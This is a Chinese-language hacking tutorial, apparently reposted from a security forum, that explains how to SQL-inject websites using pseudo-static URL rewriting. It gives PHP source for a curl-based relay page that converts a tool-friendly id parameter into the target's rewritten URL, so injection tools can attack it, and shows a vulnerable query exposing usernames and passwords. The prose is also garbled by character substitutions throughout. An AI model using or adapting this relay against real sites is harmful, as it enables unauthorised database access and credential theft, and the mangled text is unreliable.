对伪静态网站实施注射

对伪静态网站实施注射

伪静态网站注入方法，莱鸟扫盲来了哦，一般状况下，动态脚本的网站的url相似下面这样：

http://www.91ri.org/news.php?id=111

作了伪静态以后就成这样了

http://www.91ri.org/news.php/id/111.html

以斜杠“/”代替了“=”并在最后加上.html，这样一来，就没法直接用工具来注入了，

如今咱们就来讨论下如何用工具来注入，你们都知道cookies注入中转吧，其实原理都差很少，

咱们本身写一个动态网页脚本，构造本身的url规则，经过这个页面中转来访问目标页！

即咱们把伪静态url规则变回原来的?id=123这样的形式，造成一个普通的可方便注入的url。

好吧，试验下！我在本地用thikphp搭建了一个简单的注入点，

由于thinkphp自带了简单的伪静态，比较方便演示。

这个注入点的sql以下：接收get过来的id

SELECT account AS username,password FROM think_user WHERE id=1

页面url以下：

http://www.91ri.org/index.php/index/index/id/111.html

变幻111的值来注入！

我比较熟悉php，就用php来写一个注入中转页面吧

tmd.php 中转页面源码：

set_time_limit(0);
$id=$_GET[“id”];
$id=str_replace(” “,”%20”,$id);
$id=str_replace(“=”,”%3D”,$id);
//$url = “http://www.91ri.org/test/id-$id.html“;
$url = “http://www.91ri.org/inj/index.php/index/index/id/$id.html“;
//echo $url;
 
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, “$url”);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
 
$output = curl_exec($ch);
curl_close($ch);
print_r($output);

将这个文件保存成tmd.php便可，这个文件url以下：

http://www.91ri.org/inj/tmd.php

把产生注入的$id根据目标页的伪静态规则放到指定的位置就能够了。如上。

原理就是经过curl来取得目标页的内容（与直接访问目标页效果同样），

只须要修改$url的内容就能够适应各类伪静态规则了。

脚本比较简陋，有须要的童鞋，可根据状况加入post方式，代理，referer等功能。

咱们如今访问 http://www.91ri.org/inj/tmd.php?id=111，

即至关于访问 http://www.91ri.org/inj/index.php/index/index/id/111.html ，

如今咱们就能够把 http://www.91ri.org/inj/tmd.php?id=111 这个链接放到工具里面注入了。

本文做者不明(转载时未见原做者版权)由网络安全攻防研究室(www.91ri.org) 信息安全小组收集整理.